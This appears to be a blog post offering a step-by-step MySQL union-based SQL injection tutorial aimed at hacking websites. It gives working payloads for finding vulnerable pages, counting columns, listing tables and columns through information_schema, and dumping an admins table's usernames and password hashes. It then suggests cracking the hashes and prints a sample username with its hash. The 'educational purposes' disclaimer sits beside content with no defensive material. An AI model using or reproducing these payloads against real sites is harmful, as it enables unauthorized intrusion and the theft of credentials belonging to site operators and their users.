Latest News

Learn How Hackers Hack Websites MYSQL Injection Tutorial

    - SQL Injection -
This Article Is About how to Hack a website with SQL Injection.I and Takes No responsibility for it,s misuse.ok.

we have a target let see if this is vnlnerable to sql Injection to check it put a ' in the end'\

it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[- order by 1-- order by 2-- order by 3--

do that untill u get a error

It gives a error on order by 6--

that mean it only has 5 columns ..  because it didn,t give a error on order by 5--
ok lets do the Union
to do this .. u need to use this command Union select union select 1,2,3,4,5--

like that ..

there sould be number pop up somewhere

we got number 2 pop'd .. ok lets do the inject to 2
1st thing we need to check the db version if its 5 ..we continue .. if itsversion 4 .. u have to guess the table and columns to check the database version use this command "@@version" or "version()"its the version 5


ok now .. 

let get the table names.. to do that u need to use this commands

we put this because we need the tables of the default detabase
where table_schema=database()--

we have the list of table here now

ok .. now we got this tables 
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--




users,ok we have the admin table here ..ok lets get the columns now .. to do that just chnage this
union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

Now we have the columns 







now lets put this togeter !!

Table : admins
Columns : id,nick,pass,

In this we asked for the columns name's data from admin table

union select 1,group_concat(id,0x3a,nick,0x3a,pass),3,4,5 from admins--
now here we have the id , nick and password hash .. you need to use a md5 cracker to crack this password .
This Tutorial Is Only For Educational Purposes.
So Friends that all for this tutorial
Username : MaTySeK, 

Password Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253

No comments:

Post a Comment


Powered by Blogger.